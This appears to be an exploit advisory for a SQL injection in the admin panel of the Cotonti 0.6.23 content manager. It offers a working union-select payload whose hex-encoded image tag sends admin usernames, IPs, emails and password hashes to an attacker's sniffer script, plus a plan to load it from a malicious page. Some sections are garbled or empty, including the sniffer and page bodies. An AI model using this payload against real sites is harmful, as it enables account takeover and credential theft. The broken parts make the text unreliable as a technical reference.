================================================================== Vulnerable Software: cotonti-0.6.23 Official Site: http://www.cotonti.com/ Tested version: http://cotonti.googlecode.com/files/cotonti- ================================================================== About Software: Cotonti is a powerful open-source web development framework and content manager with a focus on security, speed and flexibility. ================================================================== Tested on: *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off /* OS: Windows XP SP2 (32 bit) Apache: PHP Version: MYSQL: 5.5.25 */ ================================================================== Vuln Desc: cotonti-0.6.23 is vulnerable to Remote SQL injection vuln. ================================================================== Yet I discovered this vuln in seditio 170 version. But now i noticed same vuln also affects cotonti-0.6.23 and some previous versions. Remember folks: SQL Injection in administration panel it doesn't means we can't exploit.It isn't Panacea anymore. Below is fully functional and mixed exploits collection to exploit this vuln and steal admin credentials. BTW,depends on your fantasy this vuln also can be used to create in eg: XSS =Steal ANTICSRF tokens=Phish, completely dump sed_users table (simple loop and where user_id=INCREMENTED_ID) will do all this things for you. Anyways... I'll show to you how to steal (username,IP,email address,password) from database and silently mail out all this stuff. Here we go: ================================================================== Generating Payload: Payload 1: #We need to create "link" to our snifer# mysql> select hex(' select hex('" heigth=0 width=0 />') \g +--------------------------------------------+ | hex('" heigth=0 width=0 />') | +--------------------------------------------+ | 22206865696774683D302077696474683D30202F3E | +--------------------------------------------+ 1 row in set (0.00 sec) ================================================================== ================================================================== Snifer: //traffic.php ================BEGIN traffic.php=============== ================EOF traffic.php================= And now... We'll attach the following SQL Injection exploit to our malicious page(to PAGE1.HTML) Exploit: ============== SQL INJECTION EXPLOIT==================== http://target_site.tld/admin.php?m=hits&f=year&v=1' union select 1,concat(0x3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261666669632E7068703F67657470776E65643D,user_name,0x7c,user_lastip,0x7c,user_email,0x7c,user_password,0x22206865696774683D302077696474683D30202F3E) from sed_users where user_id=1-- AND 1='1 ============== EOF SQL INJECTION EXPLOIT================ ====================================================== Creating malicious page which will do all this things for us: ================= PAGE1.HTML====================

Congrats! You have been PwNeD ;)